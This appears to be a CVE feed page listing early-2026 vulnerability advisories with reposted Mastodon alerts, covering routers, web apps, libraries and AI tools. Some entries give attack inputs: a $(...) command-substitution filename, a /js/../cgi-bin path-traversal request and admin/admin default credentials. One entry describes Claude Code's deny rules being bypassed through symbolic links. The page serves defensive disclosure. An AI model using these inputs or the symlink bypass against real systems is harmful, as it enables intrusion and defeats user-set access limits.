#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15319
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T00:30:37

1 posts

Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.

thehackerwire@mastodon.social at 2026-02-09T23:23:03.000Z ##

🟠 CVE-2025-15319 - High (7.8)

Tanium addressed a local privilege escalation vulnerability in Endpoint Configuration Toolset Solution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25791
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-09T22:39:51

1 posts

## Summary The DNS C2 listener accepts unauthenticated `TOTP` bootstrap messages and allocates server-side DNS sessions without validating OTP values, even when `EnforceOTP` is enabled. Because sessions are stored without a cleanup/expiry path in this flow, an unauthenticated remote actor can repeatedly create sessions and drive memory exhaustion. ## Vulnerable Component - `server/c2/dns.go:84-90

thehackerwire@mastodon.social at 2026-02-09T21:19:58.000Z ##

🟠 CVE-2026-25791 - High (7.5)

Sliver is a command and control framework that uses a custom Wireguard netstack. Prior to 1.7.0, the DNS C2 listener accepts unauthenticated TOTP bootstrap messages and allocates server-side DNS sessions without validating OTP values, even when En...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25639
(7.5 HIGH)

EPSS: 0.01%

updated 2026-02-09T22:39:36

1 posts

# Denial of Service via **proto** Key in mergeConfig ### Summary The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service. ### Details The vulnerability exists in `lib/core/

thehackerwire@mastodon.social at 2026-02-09T21:16:07.000Z ##

🟠 CVE-2026-25639 - High (7.5)

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25761
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-09T21:55:30.093000

1 posts

Super-linter is a combination of multiple linters to run as a GitHub Action or standalone. From 6.0.0 to 8.3.0, the Super-linter GitHub Action is vulnerable to command injection via crafted filenames. When this action is used in downstream GitHub Actions workflows, an attacker can submit a pull request that introduces a file whose name contains shell command substitution syntax, such as $(...). In

thehackerwire@mastodon.social at 2026-02-09T21:19:48.000Z ##

🟠 CVE-2026-25761 - High (8.8)

Super-linter is a combination of multiple linters to run as a GitHub Action or standalone. From 6.0.0 to 8.3.0, the Super-linter GitHub Action is vulnerable to command injection via crafted filenames. When this action is used in downstream GitHub ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69214
(8.8 HIGH)

EPSS: 0.01%

updated 2026-02-09T21:53:03.017000

1 posts

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.

thehackerwire@mastodon.social at 2026-02-09T22:53:32.000Z ##

🟠 CVE-2025-69214 - High (8.8)

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attac...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25803
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-09T16:08:55.263000

2 posts

3DP-MANAGER is an inbound generator for 3x-ui. In version 2.0.1 and prior, the application automatically creates an administrative account with known default credentials (admin/admin) upon the first initialization. Attackers with network access to the application's login interface can gain full administrative control, managing VPN tunnels and system settings. This issue will be patched in version

thehackerwire@mastodon.social at 2026-02-06T23:22:21.000Z ##

🔴 CVE-2026-25803 - Critical (9.8)

3DP-MANAGER is an inbound generator for 3x-ui. In version 2.0.1 and prior, the application automatically creates an administrative account with known default credentials (admin/admin) upon the first initialization. Attackers with network access to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-06T23:22:07.000Z ##

🔴 CVE-2026-25803 - Critical (9.8)

3DP-MANAGER is an inbound generator for 3x-ui. In version 2.0.1 and prior, the application automatically creates an administrative account with known default credentials (admin/admin) upon the first initialization. Attackers with network access to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2070
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-09T16:08:55.263000

1 posts

A vulnerability has been found in UTT 进取 520W 1.7.7-180627. The affected element is the function strcpy of the file /goform/formPolicyRouteConf. Such manipulation of the argument GroupName leads to buffer overflow. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-06T23:21:30.000Z ##

🟠 CVE-2026-2070 - High (8.8)

A vulnerability has been found in UTT 进取 520W 1.7.7-180627. The affected element is the function strcpy of the file /goform/formPolicyRouteConf. Such manipulation of the argument GroupName leads to buffer overflow. The attack can be executed r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2068
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-09T16:08:55.263000

1 posts

A vulnerability was detected in UTT 进取 520W 1.7.7-180627. This issue affects the function strcpy of the file /goform/formSyslogConf. The manipulation of the argument ServerIp results in buffer overflow. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-06T22:16:36.000Z ##

🟠 CVE-2026-2068 - High (8.8)

A vulnerability was detected in UTT 进取 520W 1.7.7-180627. This issue affects the function strcpy of the file /goform/formSyslogConf. The manipulation of the argument ServerIp results in buffer overflow. The attack may be launched remotely. The...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-10465
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-09T16:08:35.290000

1 posts

Unrestricted Upload of File with Dangerous Type vulnerability in Birtech Information Technologies Industry and Trade Ltd. Co. Sensaway allows Upload a Web Shell to a Web Server.This issue affects Sensaway: through 09022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-09T14:21:21.000Z ##

🟠 CVE-2025-10465 - High (8.8)

Unrestricted Upload of File with Dangerous Type vulnerability in Birtech Information Technologies Industry and Trade Ltd. Co. Sensaway allows Upload a Web Shell to a Web Server.This issue affects Sensaway: through 09022026.

NOTE: The vendor was c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-7799
(8.6 HIGH)

EPSS: 0.04%

updated 2026-02-09T16:08:35.290000

1 posts

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Zirve Information Technologies Inc. E-Taxpayer Accounting Website allows Reflected XSS.This issue affects e-Taxpayer Accounting Website: through 07082025.

thehackerwire@mastodon.social at 2026-02-09T09:20:15.000Z ##

🟠 CVE-2025-7799 - High (8.6)

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Zirve Information Technologies Inc. E-Taxpayer Accounting Website allows Reflected XSS.This issue affects e-Taxpayer Accounting Website: t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2236
(7.5 HIGH)

EPSS: 0.05%

updated 2026-02-09T16:08:35.290000

3 posts

C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

thehackerwire@mastodon.social at 2026-02-09T08:26:42.000Z ##

🟠 CVE-2026-2236 - High (7.5)

C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T08:25:41.000Z ##

🟠 CVE-2026-2236 - High (7.5)

C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T08:23:54.000Z ##

🟠 CVE-2026-2236 - High (7.5)

C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22903
(9.8 CRITICAL)

EPSS: 0.43%

updated 2026-02-09T16:08:35.290000

1 posts

An unauthenticated remote attacker can send a crafted HTTP request containing an overly long SESSIONID cookie. This can trigger a stack buffer overflow in the modified lighttpd server, causing it to crash and potentially enabling remote code execution due to missing stack protections.

thehackerwire@mastodon.social at 2026-02-09T08:24:22.000Z ##

🔴 CVE-2026-22903 - Critical (9.8)

An unauthenticated remote attacker can send a crafted HTTP request containing an overly long SESSIONID cookie. This can trigger a stack buffer overflow in the modified lighttpd server, causing it to crash and potentially enabling remote code execu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0870
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-09T16:08:35.290000

1 posts

MacroHub developed by GIGABYTE has a Local Privilege Escalation vulnerability. Due to the MacroHub application launching external applications with improper privileges, allowing authenticated local attackers to execute arbitrary code with SYSTEM privileges.

thehackerwire@mastodon.social at 2026-02-09T07:17:50.000Z ##

🟠 CVE-2026-0870 - High (7.8)

MacroHub developed by GIGABYTE has a Local Privilege Escalation vulnerability. Due to the MacroHub application launching external applications with improper privileges, allowing authenticated local attackers to execute arbitrary code with SYSTEM p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15100
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-09T16:08:35.290000

1 posts

The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.03. This is due to the plugin allowing a user to update arbitrary user meta through the 'jay_panel_ajax_update_profile' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administra

thehackerwire@mastodon.social at 2026-02-08T02:20:46.000Z ##

🟠 CVE-2025-15100 - High (8.8)

The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.03. This is due to the plugin allowing a user to update arbitrary user meta through the 'jay_panel_ajax_update_profile' f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2086
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-09T16:08:35.290000

1 posts

A vulnerability was detected in UTT HiPER 810G up to 1.7.7-171114. Affected by this vulnerability is the function strcpy of the file /goform/formFireWall of the component Management Interface. The manipulation of the argument GroupName results in buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but

thehackerwire@mastodon.social at 2026-02-07T14:17:53.000Z ##

🟠 CVE-2026-2086 - High (8.8)

A vulnerability was detected in UTT HiPER 810G up to 1.7.7-171114. Affected by this vulnerability is the function strcpy of the file /goform/formFireWall of the component Management Interface. The manipulation of the argument GroupName results in ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-59023
(8.2 HIGH)

EPSS: 0.01%

updated 2026-02-09T15:30:37

1 posts

Crafted delegations or IP fragments can poison cached delegations in Recursor.

thehackerwire@mastodon.social at 2026-02-09T15:21:44.000Z ##

🟠 CVE-2025-59023 - High (8.2)

Crafted delegations or IP fragments can poison cached delegations in Recursor.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25724
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-09T14:47:41.783000

1 posts

Claude Code is an agentic coding tool. Prior to version 2.1.7, Claude Code failed to strictly enforce deny rules configured in settings.json when accessing files through symbolic links. If a user explicitly denied Claude Code access to a file (such as /etc/passwd) and Claude Code had access to a symbolic link pointing to that file, it was possible for Claude Code to read the restricted file throug

thehackerwire@mastodon.social at 2026-02-09T16:07:10.000Z ##

🟠 CVE-2026-25724 - High (7.5)

Claude Code is an agentic coding tool. Prior to version 2.1.7, Claude Code failed to strictly enforce deny rules configured in settings.json when accessing files through symbolic links. If a user explicitly denied Claude Code access to a file (suc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-6830
(9.8 CRITICAL)

EPSS: 0.01%

updated 2026-02-09T12:30:30

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xpoda Türkiye Information Technology Inc. Xpoda Studio allows SQL Injection.This issue affects Xpoda Studio: through 09022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-09T13:02:19.000Z ##

🔴 CVE-2025-6830 - Critical (9.8)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xpoda Türkiye Information Technology Inc. Xpoda Studio allows SQL Injection.This issue affects Xpoda Studio: through 09022026. NOTE: The vendor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25848
(9.1 CRITICAL)

EPSS: 0.00%

updated 2026-02-09T12:30:30

1 posts

In JetBrains Hub before 2025.3.119807 authentication bypass allowing administrative actions was possible

thehackerwire@mastodon.social at 2026-02-09T11:17:21.000Z ##

🔴 CVE-2026-25848 - Critical (9.1)

In JetBrains Hub before 2025.3.119807 authentication bypass allowing administrative actions was possible

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25847
(8.2 HIGH)

EPSS: 0.00%

updated 2026-02-09T12:30:30

1 posts

In JetBrains PyCharm before 2025.3.2 a DOM-based XSS on Jupyter viewer page was possible

thehackerwire@mastodon.social at 2026-02-09T11:17:10.000Z ##

🟠 CVE-2026-25847 - High (8.2)

In JetBrains PyCharm before 2025.3.2 a DOM-based XSS on Jupyter viewer page was possible

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1709
(9.4 CRITICAL)

EPSS: 0.06%

updated 2026-02-09T10:15:57.377000

1 posts

A flaw was found in Keylime. The Keylime registrar, since version 7.12.0, does not enforce client-side Transport Layer Security (TLS) authentication. This authentication bypass vulnerability allows unauthenticated clients with network access to perform administrative operations, including listing agents, retrieving public Trusted Platform Module (TPM) data, and deleting agents, by connecting witho

thehackerwire@mastodon.social at 2026-02-06T20:18:17.000Z ##

🔴 CVE-2026-1709 - Critical (9.4)

A flaw was found in Keylime. The Keylime registrar, since version 7.12.0, does not enforce client-side Transport Layer Security (TLS) authentication. This authentication bypass vulnerability allows unauthenticated clients with network access to pe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2234
(9.1 CRITICAL)

EPSS: 0.05%

updated 2026-02-09T09:30:28

3 posts

C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.

thehackerwire@mastodon.social at 2026-02-09T08:26:32.000Z ##

🔴 CVE-2026-2234 - Critical (9.1)

C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T08:25:30.000Z ##

🔴 CVE-2026-2234 - Critical (9.1)

C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T08:23:45.000Z ##

🔴 CVE-2026-2234 - Critical (9.1)

C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22904
(9.8 CRITICAL)

EPSS: 0.12%

updated 2026-02-09T09:30:28

1 posts

Improper length handling when parsing multiple cookie fields (including TRACKID) allows an unauthenticated remote attacker to send oversized cookie values and trigger a stack buffer overflow, resulting in a denial‑of‑service condition and possible remote code execution.

thehackerwire@mastodon.social at 2026-02-09T08:24:01.000Z ##

🔴 CVE-2026-22904 - Critical (9.8)

Improper length handling when parsing multiple cookie fields (including TRACKID) allows an unauthenticated remote attacker to send oversized cookie values and trigger a stack buffer overflow, resulting in a denial‑of‑service condition and poss...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1868
(10.0 CRITICAL)

EPSS: 0.03%

updated 2026-02-09T09:30:28

1 posts

GitLab has remediated a vulnerability in the Duo Workflow Service component of GitLab AI Gateway affecting all versions of the AI Gateway from 18.1.6, 18.2.6, 18.3.1 to 18.6.1, 18.7.0, and 18.8.0 in which AI Gateway was vulnerable to insecure template expansion of user supplied data via crafted Duo Agent Platform Flow definitions. This vulnerability could be used to cause Denial of Service or gain

thehackerwire@mastodon.social at 2026-02-09T07:17:40.000Z ##

🔴 CVE-2026-1868 - Critical (9.9)

GitLab has remediated a vulnerability in the Duo Workflow Service component of GitLab AI Gateway affecting all versions of the AI Gateway from 18.1.6, 18.2.6, 18.3.1 to 18.6.1, 18.7.0, and 18.8.0 in which AI Gateway was vulnerable to insecure temp...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22905
(7.5 HIGH)

EPSS: 0.10%

updated 2026-02-09T09:30:27

2 posts

An unauthenticated remote attacker can bypass authentication by exploiting insufficient URI validation and using path traversal sequences (e.g., /js/../cgi-bin/post.cgi), gaining unauthorized access to protected CGI endpoints and configuration downloads.

thehackerwire@mastodon.social at 2026-02-09T08:25:41.000Z ##

🟠 CVE-2026-22905 - High (7.5)

An unauthenticated remote attacker can bypass authentication by exploiting insufficient URI validation and using path traversal sequences (e.g., /js/../cgi-bin/post.cgi), gaining unauthorized access to protected CGI endpoints and configuration dow...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T08:24:04.000Z ##

🟠 CVE-2026-22905 - High (7.5)

An unauthenticated remote attacker can bypass authentication by exploiting insufficient URI validation and using path traversal sequences (e.g., /js/../cgi-bin/post.cgi), gaining unauthorized access to protected CGI endpoints and configuration dow...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22906
(9.8 CRITICAL)

EPSS: 0.07%

updated 2026-02-09T09:30:27

1 posts

User credentials are stored using AES‑ECB encryption with a hardcoded key. An unauthenticated remote attacker obtaining the configuration file can decrypt and recover plaintext usernames and passwords, especially when combined with the authentication bypass.

thehackerwire@mastodon.social at 2026-02-09T08:24:11.000Z ##

🔴 CVE-2026-22906 - Critical (9.8)

User credentials are stored using AES‑ECB encryption with a hardcoded key. An unauthenticated remote attacker obtaining the configuration file can decrypt and recover plaintext usernames and passwords, especially when combined with the authentic...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1615
(9.8 CRITICAL)

EPSS: 0.22%

updated 2026-02-09T06:30:37

1 posts

All versions of the package jsonpath are vulnerable to Arbitrary Code Injection via unsafe evaluation of user-supplied JSON Path expressions. The library relies on the static-eval module to process JSON Path input, which is not designed to handle untrusted data safely. An attacker can exploit this vulnerability by supplying a malicious JSON Path expression that, when evaluated, executes arbitrary

thehackerwire@mastodon.social at 2026-02-09T05:17:55.000Z ##

🔴 CVE-2026-1615 - Critical (9.8)

All versions of the package jsonpath are vulnerable to Arbitrary Code Injection via unsafe evaluation of user-supplied JSON Path expressions. The library relies on the static-eval module to process JSON Path input, which is not designed to handle ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2186
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-08T21:30:29

1 posts

A vulnerability has been found in Tenda RX3 16.03.13.11. Impacted is the function fromSetIpMacBind of the file /goform/SetIpMacBind. Such manipulation of the argument list leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-02-08T21:16:19.000Z ##

🟠 CVE-2026-2186 - High (8.8)

A vulnerability has been found in Tenda RX3 16.03.13.11. Impacted is the function fromSetIpMacBind of the file /goform/SetIpMacBind. Such manipulation of the argument list leads to stack-based buffer overflow. The attack may be performed from remo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2187
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-08T21:30:29

1 posts

A vulnerability was found in Tenda RX3 16.03.13.11. The affected element is the function set_qosMib_list of the file /goform/formSetQosBand. Performing a manipulation of the argument list results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made public and could be used.

1 repos

https://github.com/daytriftnewgen/CVE-2026-21876

thehackerwire@mastodon.social at 2026-02-08T21:16:29.000Z ##

🟠 CVE-2026-2187 - High (8.8)

A vulnerability was found in Tenda RX3 16.03.13.11. The affected element is the function set_qosMib_list of the file /goform/formSetQosBand. Performing a manipulation of the argument list results in stack-based buffer overflow. It is possible to i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2181
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-08T21:30:29

1 posts

A security flaw has been discovered in Tenda RX3 16.03.13.11. Affected by this vulnerability is an unknown functionality of the file /goform/openSchedWifi. Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-based buffer overflow. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-02-08T20:18:27.000Z ##

🟠 CVE-2026-2181 - High (8.8)

A security flaw has been discovered in Tenda RX3 16.03.13.11. Affected by this vulnerability is an unknown functionality of the file /goform/openSchedWifi. Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-base...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2180
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-08T21:30:19

1 posts

A vulnerability was identified in Tenda RX3 16.03.13.11. Affected is an unknown function of the file /goform/fast_setting_wifi_set. Such manipulation of the argument ssid_5g leads to stack-based buffer overflow. The attack can be launched remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-02-08T20:18:17.000Z ##

🟠 CVE-2026-2180 - High (8.8)

A vulnerability was identified in Tenda RX3 16.03.13.11. Affected is an unknown function of the file /goform/fast_setting_wifi_set. Such manipulation of the argument ssid_5g leads to stack-based buffer overflow. The attack can be launched remotely...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2140
(8.8 HIGH)

EPSS: 0.09%

updated 2026-02-08T09:30:22

1 posts

A vulnerability was identified in Tenda TX9 up to 22.03.02.10_multi. Affected by this issue is the function sub_4223E0 of the file /goform/setMacFilterCfg. Such manipulation of the argument deviceList leads to buffer overflow. The attack may be launched remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-02-08T07:17:02.000Z ##

🟠 CVE-2026-2140 - High (8.8)

A vulnerability was identified in Tenda TX9 up to 22.03.02.10_multi. Affected by this issue is the function sub_4223E0 of the file /goform/setMacFilterCfg. Such manipulation of the argument deviceList leads to buffer overflow. The attack may be la...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2137
(8.8 HIGH)

EPSS: 0.09%

updated 2026-02-08T06:31:54

1 posts

A vulnerability has been found in Tenda TX3 up to 16.03.13.11_multi. This impacts an unknown function of the file /goform/SetIpMacBind. The manipulation of the argument list leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-02-08T06:17:17.000Z ##

🟠 CVE-2026-2137 - High (8.8)

A vulnerability has been found in Tenda TX3 up to 16.03.13.11_multi. This impacts an unknown function of the file /goform/SetIpMacBind. The manipulation of the argument list leads to buffer overflow. The attack can be initiated remotely. The explo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2138
(8.8 HIGH)

EPSS: 0.09%

updated 2026-02-08T06:31:53

1 posts

A vulnerability was found in Tenda TX9 up to 22.03.02.10_multi. Affected is the function sub_42D03C of the file /goform/SetStaticRouteCfg. The manipulation of the argument list results in buffer overflow. The attack can be launched remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-02-08T06:17:07.000Z ##

🟠 CVE-2026-2138 - High (8.8)

A vulnerability was found in Tenda TX9 up to 22.03.02.10_multi. Affected is the function sub_42D03C of the file /goform/SetStaticRouteCfg. The manipulation of the argument list results in buffer overflow. The attack can be launched remotely. The e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15027
(9.8 CRITICAL)

EPSS: 0.07%

updated 2026-02-08T03:30:35

1 posts

The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.03. This is due to the plugin allowing a user to update arbitrary user meta through the 'jay_login_register_ajax_create_final_user' function. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

thehackerwire@mastodon.social at 2026-02-08T02:20:36.000Z ##

🔴 CVE-2025-15027 - Critical (9.8)

The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.03. This is due to the plugin allowing a user to update arbitrary user meta through the 'jay_login_register_ajax_create_f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2071
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-07T03:30:18

1 posts

A vulnerability was found in UTT 进取 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formP2PLimitConfig. Performing a manipulation of the argument except results in buffer overflow. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any w

thehackerwire@mastodon.social at 2026-02-07T01:16:31.000Z ##

🟠 CVE-2026-2071 - High (8.8)

A vulnerability was found in UTT 进取 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formP2PLimitConfig. Performing a manipulation of the argument except results in buffer overflow. The attack is possible to b...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25762
(7.5 HIGH)

EPSS: 0.01%

updated 2026-02-07T00:33:35

1 posts

### Summary A Denial of Service (DoS) vulnerability (CWE-400) exists in the multipart file handling logic of `@adonisjs/bodyparser`. When processing file uploads, the multipart parser may accumulate an unbounded amount of data in memory while attempting to detect file types, potentially leading to excessive memory consumption and process termination. This issue affects applications that accept `

thehackerwire@mastodon.social at 2026-02-06T23:21:48.000Z ##

🟠 CVE-2026-25762 - High (7.5)

AdonisJS is a TypeScript-first web framework. Prior to versions 10.1.3 and 11.0.0-next.9, a denial of service (DoS) vulnerability exists in the multipart file handling logic of @adonisjs/bodyparser. When processing file uploads, the multipart pars...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25732
(7.5 HIGH)

EPSS: 0.12%

updated 2026-02-07T00:31:59

1 posts

### Summary NiceGUI's `FileUpload.name` property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern `UPLOAD_DIR / file.name`. Malicious filenames containing `../` sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deploy

1 repos

https://github.com/mbanyamer/CVE-2026-25732-NiceGUI-3.6.1

thehackerwire@mastodon.social at 2026-02-06T22:16:45.000Z ##

🟠 CVE-2026-25732 - High (7.5)

NiceGUI is a Python-based UI framework. Prior to 3.7.0, NiceGUI's FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious fi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25544
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-02-07T00:31:53

2 posts

